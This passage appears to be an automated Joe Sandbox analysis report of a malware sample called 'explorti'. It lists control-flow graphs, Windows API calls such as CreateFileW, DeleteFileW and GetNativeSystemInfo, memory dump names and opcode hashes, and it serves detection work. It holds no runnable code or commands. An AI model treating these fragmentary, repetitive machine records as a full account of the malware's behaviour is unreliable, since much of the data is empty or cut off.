                      • __dosmaperr.LIBCMT ref: 00566F12
                        • Part of subcall function 00567177: __dosmaperr.LIBCMT ref: 005671AC
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 3ec7a9b3ab6e2a19f9c5d4b5879b2ec32ac54e2e51fa76dafcc31fbcd1a2de41
                      • Instruction ID: 4c981425450533908426293884e76d7e45bbfe023860a6cb39a265d29638df0f
                      • Opcode Fuzzy Hash: 3ec7a9b3ab6e2a19f9c5d4b5879b2ec32ac54e2e51fa76dafcc31fbcd1a2de41
                      • Instruction Fuzzy Hash: BA414C75900209ABDB24EFB5EC599ABBFF9FF89300B10482DF456D3210EA31A944CB61

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1610 56af0b-56af17 1611 56af49-56af54 call 567443 1610->1611 1612 56af19-56af1b 1610->1612 1619 56af56-56af58 1611->1619 1613 56af34-56af45 RtlAllocateHeap 1612->1613 1614 56af1d-56af1e 1612->1614 1616 56af47 1613->1616 1617 56af20-56af27 call 569c81 1613->1617 1614->1613 1616->1619 1617->1611 1622 56af29-56af32 call 568cf9 1617->1622 1622->1611 1622->1613
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00546B27,?,'kTd+Y,0054D32C,'kTd+Y,?,005478FB,?,05210980), ref: 0056AF3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 'kTd+Y
                      • API String ID: 1279760036-721370433
                      • Opcode ID: 992e5abdc654745e7363df7a5d40e7f48c72c89ac81db994bba1ca0af280fd4d
                      • Instruction ID: 480faa8fc009432eccd3bbf6a1688fc5c56aaffccd6034c4dad636b154e3e337
                      • Opcode Fuzzy Hash: 992e5abdc654745e7363df7a5d40e7f48c72c89ac81db994bba1ca0af280fd4d
                      • Instruction Fuzzy Hash: 79E0EDBA20A22266EA2033755D45B6ABE8CFF823B2F050251AC14B7181DF61CC009AE3

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1625 566c99-566ca5 1626 566ca7-566cc3 call 567430 call 567443 call 566b8a 1625->1626 1627 566cc4-566ce8 call 564020 1625->1627 1633 566d06-566d28 CreateFileW 1627->1633 1634 566cea-566d04 call 567430 call 567443 call 566b8a 1627->1634 1635 566d2a-566d2e call 566e01 1633->1635 1636 566d38-566d3f call 566d77 1633->1636 1656 566d72-566d76 1634->1656 1643 566d33-566d36 1635->1643 1647 566d40-566d42 1636->1647 1643->1647 1649 566d64-566d67 1647->1649 1650 566d44-566d61 call 564020 1647->1650 1654 566d70 1649->1654 1655 566d69-566d6f FindCloseChangeNotification 1649->1655 1650->1649 1654->1656 1655->1654
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5e6179ae35137b385b1e8ead39c44a6e1635a35b7a101322b1dc1dd5d8267d3c
                      • Instruction ID: d6db9f5e51a7cd98aaae9f5593fbe5155ed8fd9090d5e5a571e789da1c7e1e96
                      • Opcode Fuzzy Hash: 5e6179ae35137b385b1e8ead39c44a6e1635a35b7a101322b1dc1dd5d8267d3c
                      • Instruction Fuzzy Hash: 7D21D671A052097BEB117B649C4AB9F3F29BF82778F200310F9243B1D1DB705E0596A2

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1658 56b515-56b525 DeleteFileW 1659 56b527-56b538 call 56740d 1658->1659 1660 56b539-56b53c 1658->1660
                      APIs
                      • DeleteFileW.KERNELBASE(?,?,005669C7,?), ref: 0056B51D
                      • __dosmaperr.LIBCMT ref: 0056B52E
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: DeleteFile__dosmaperr
                      • String ID:
                      • API String ID: 1911827773-0
                      • Opcode ID: 3c4d7f261d8181d115fcd731deebc97f82c93970804f6a738b03f56e7955be99
                      • Instruction ID: dbc8a125c128494049f9cdbfa63157040ee2d911d55227ea81e80f253883e209
                      • Opcode Fuzzy Hash: 3c4d7f261d8181d115fcd731deebc97f82c93970804f6a738b03f56e7955be99
                      • Instruction Fuzzy Hash: D9D0127225A108365E1036F67C0C8573E8D6FD17743251A11F82DC6591EE66D8914491

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1711 5382b0-538331 call 564020 1715 538333-538338 1711->1715 1716 53833d-538365 call 547870 call 535b20 1711->1716 1717 53847f-53849b call 54cf21 1715->1717 1724 538367 1716->1724 1725 538369-53838b call 547870 call 535b20 1716->1725 1724->1725 1730 53838f-5383a8 1725->1730 1731 53838d 1725->1731 1734 5383aa-5383b9 1730->1734 1735 5383d9-538404 1730->1735 1731->1730 1736 5383bb-5383c9 1734->1736 1737 5383cf-5383d6 call 54d593 1734->1737 1738 538431-538452 1735->1738 1739 538406-538415 1735->1739 1736->1737 1742 53849c-5384a1 call 566b9a 1736->1742 1737->1735 1740 538454-538456 GetNativeSystemInfo 1738->1740 1741 538458-53845d 1738->1741 1744 538427-53842e call 54d593 1739->1744 1745 538417-538425 1739->1745 1746 53845e-538465 1740->1746 1741->1746 1744->1738 1745->1742 1745->1744 1746->1717 1753 538467-53846f 1746->1753 1754 538471-538476 1753->1754 1755 538478-53847b 1753->1755 1754->1717 1755->1717 1756 53847d 1755->1756 1756->1717
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00538454
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 0cf3dc29567563b97a456e1f6f443aec05e0f940e8269c9a088b2f087bf4a03b
                      • Instruction ID: f61cee8a6da4ab00c94226274138252b57dfd1a23d510f894bcca5a9a5b1b875
                      • Opcode Fuzzy Hash: 0cf3dc29567563b97a456e1f6f443aec05e0f940e8269c9a088b2f087bf4a03b
                      • Instruction Fuzzy Hash: 19512770900309ABEF18EB68CD497EEBF75BB45314F904299F814A73D1EF355A848BA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1757 566f71-566f87 1758 566f97-566fa7 1757->1758 1759 566f89-566f8d 1757->1759 1763 566fe7-566fea 1758->1763 1764 566fa9-566fbb SystemTimeToTzSpecificLocalTime 1758->1764 1759->1758 1760 566f8f-566f95 1759->1760 1761 566fec-566ff7 call 54cf21 1760->1761 1763->1761 1764->1763 1766 566fbd-566fdd call 566ff8 1764->1766 1769 566fe2-566fe5 1766->1769 1769->1761
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00566FB3
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: 84be15d6911f91f202cdd8e7580d80a84b4bb90d161de0eb6d97780339364cac
                      • Instruction ID: 4863fb76e83bed7b27ad94859f8eb01b2c943961fa07a0108a879ef8f7ca2c6e
                      • Opcode Fuzzy Hash: 84be15d6911f91f202cdd8e7580d80a84b4bb90d161de0eb6d97780339364cac
                      • Instruction Fuzzy Hash: 9F11ECB690020DBBCB10DE95D944EDFBBBCAF48310F505666E511E7184EB34EB48CB61
                      APIs
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 4f0152067d8da2c1458c548e4989c3f5998b6650caaa0154eb0b9fa3440167b0
                      • Instruction ID: c16ad9ecd640610da1846b7148c8fbbd066c3d7a35f79d8ba70ef53ab641c358
                      • Opcode Fuzzy Hash: 4f0152067d8da2c1458c548e4989c3f5998b6650caaa0154eb0b9fa3440167b0
                      • Instruction Fuzzy Hash: EDF0D131A00618BBC700BBA89D0AB5DBF75BB47764F800748E821672E1EB345A0897D3
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb4b53d71094781650b4c97e15c77944369b65861739eda312d772cd8faf035e
                      • Instruction ID: 48c1ab631245808310ef4e9ed5668f6a2d7247b07e86e0e1be45a2436350d5c4
                      • Opcode Fuzzy Hash: cb4b53d71094781650b4c97e15c77944369b65861739eda312d772cd8faf035e
                      • Instruction Fuzzy Hash: 322160EB17E010BD7102E2C62B5C9F66B6FF9D6730335842AF407D6582E2C44A8D5571
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c724e35343dae73627f3b3dc60d6b14fbf24a1d4ff86a26d7af217173d3eeb5
                      • Instruction ID: e8e2154b38479a642826771ffd284fd5546ddcfebf3b5225b13b1313347efbb8
                      • Opcode Fuzzy Hash: 0c724e35343dae73627f3b3dc60d6b14fbf24a1d4ff86a26d7af217173d3eeb5
                      • Instruction Fuzzy Hash: CB216DEB17E421BD7212F2D52B5C9FBA76FE8D6730330843AF406C6582E2C44A5D6571
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c081cdf54086ce8234affad5eb0be6e78abe13d8b4a01dbdb4c79a8527d65fbe
                      • Instruction ID: b452cafe68b5bdc180f0fec28b33baf9c0408c879969dc70c1b7024900d07a96
                      • Opcode Fuzzy Hash: c081cdf54086ce8234affad5eb0be6e78abe13d8b4a01dbdb4c79a8527d65fbe
                      • Instruction Fuzzy Hash: 63211AEB1BE020BD7142E2C62B5CAF65B6FE9D67303318526F407D5982E2C44A9D2571
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 523f4c799cd7c3c98318279c3a47b7b4fd5ee6318192afa3bf8ec12415926c0a
                      • Instruction ID: 533b855e9567f3660c4e7395757b7b8ee02ea38ee3433a02c25a3c507f270b5c
                      • Opcode Fuzzy Hash: 523f4c799cd7c3c98318279c3a47b7b4fd5ee6318192afa3bf8ec12415926c0a
                      • Instruction Fuzzy Hash: 59213AEF1BE010BD7102E2C62B5D9F6976FE9D67303308426F407D6982E2C40A4D6571
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 45af9241dbdc5059e44b3f33271a2850a64418b526f590b3c714b7762d243e1d
                      • Instruction ID: 3fbd3686f682cce95f29c41bd0291e58c3012ca9d5307355564a0ef143c9e61f
                      • Opcode Fuzzy Hash: 45af9241dbdc5059e44b3f33271a2850a64418b526f590b3c714b7762d243e1d
                      • Instruction Fuzzy Hash: A31148EB27E010BD7202E2C62B589FA676FE9D6730330C43AF406C6582E2D44A8E2571
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f5437ad7891fd62b1694ef58693802833bfa3af3a83e4e6ff3580e3f19c0a98
                      • Instruction ID: 26d1665d79e07909c7d87330c5f778135be88fd43070f8124b047e296ceec910
                      • Opcode Fuzzy Hash: 8f5437ad7891fd62b1694ef58693802833bfa3af3a83e4e6ff3580e3f19c0a98
                      • Instruction Fuzzy Hash: DE0157EB17E010BD3212E2C63B589FB676EE9D6B30331C42BF846C2582E2D44A9D6571
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6e7cc0a0d0df7fd1f5ee974b889fa620f68cac1169ac41c101249f9f9621ee81
                      • Instruction ID: 910982576ee1b33593086e1b926393bcf3147fe73bada35ca73f263b4568e00c
                      • Opcode Fuzzy Hash: 6e7cc0a0d0df7fd1f5ee974b889fa620f68cac1169ac41c101249f9f9621ee81
                      • Instruction Fuzzy Hash: 5E0117EB17E010BD3201E2C62B5C9BB576FE9D2730331C42BF807C6582E2D44A8D5571
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 76591daf30a0141f24c3ed48943724cddb76b7d20f7cd60e22969dea9bf6ae0e
                      • Instruction ID: 94a3938e0045e24c7921656ee064f63661a44212cb722b547ffb9d110dfef70d
                      • Opcode Fuzzy Hash: 76591daf30a0141f24c3ed48943724cddb76b7d20f7cd60e22969dea9bf6ae0e
                      • Instruction Fuzzy Hash: 6F016DEB17E4106DB201E1C53B5CAFB6B1FE9D2A30775883BF447C6186A2D54A4E15B0
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2ef160cb8f3e92c9c60d05cfa6e42f2f3bc2b98301a213742450c3ba936c3ea
                      • Instruction ID: 63301c04f6ecc4701c61f28a82d3aa8e7adc2defb74dc0876359f4c01e8efc26
                      • Opcode Fuzzy Hash: b2ef160cb8f3e92c9c60d05cfa6e42f2f3bc2b98301a213742450c3ba936c3ea
                      • Instruction Fuzzy Hash: 5F0156EB17E011AC7202E1C63B58AFB575FE9D6731335842BF406C6582E2C84A8E1171
                      Memory Dump Source
                      • Source File: 00000006.00000002.2937014534.0000000005280000.00000040.00001000.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_5280000_explorti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c5276ba03188f67a7d3ea1ccf274e79b60e3782ac50d2bc39ccdde4386164ba2
                      • Instruction ID: 9302d73af2b6a8f40a286b0581945fb55d6b8396eff167262c51b01ffd3f1e82
                      • Opcode Fuzzy Hash: c5276ba03188f67a7d3ea1ccf274e79b60e3782ac50d2bc39ccdde4386164ba2
                      • Instruction Fuzzy Hash: 4EF0F8EB13E011AD3241E1C23B18ABA535FE8D5730375C437F406C1546D2C84A8D50B0
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 1cc1017d356abff0cf79e5e4c9aec4a8466e70e7d4f77934139524ac9b40a49a
                      • Instruction ID: fac95eb6c683dfca50b2713e69372b8f7f2c943083f0715cd8244b3cc339f27d
                      • Opcode Fuzzy Hash: 1cc1017d356abff0cf79e5e4c9aec4a8466e70e7d4f77934139524ac9b40a49a
                      • Instruction Fuzzy Hash: 28C25D71E042288FDB25CE28ED447E9BBB5FB48314F1485EAD84DE7241E774AE85AF40
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
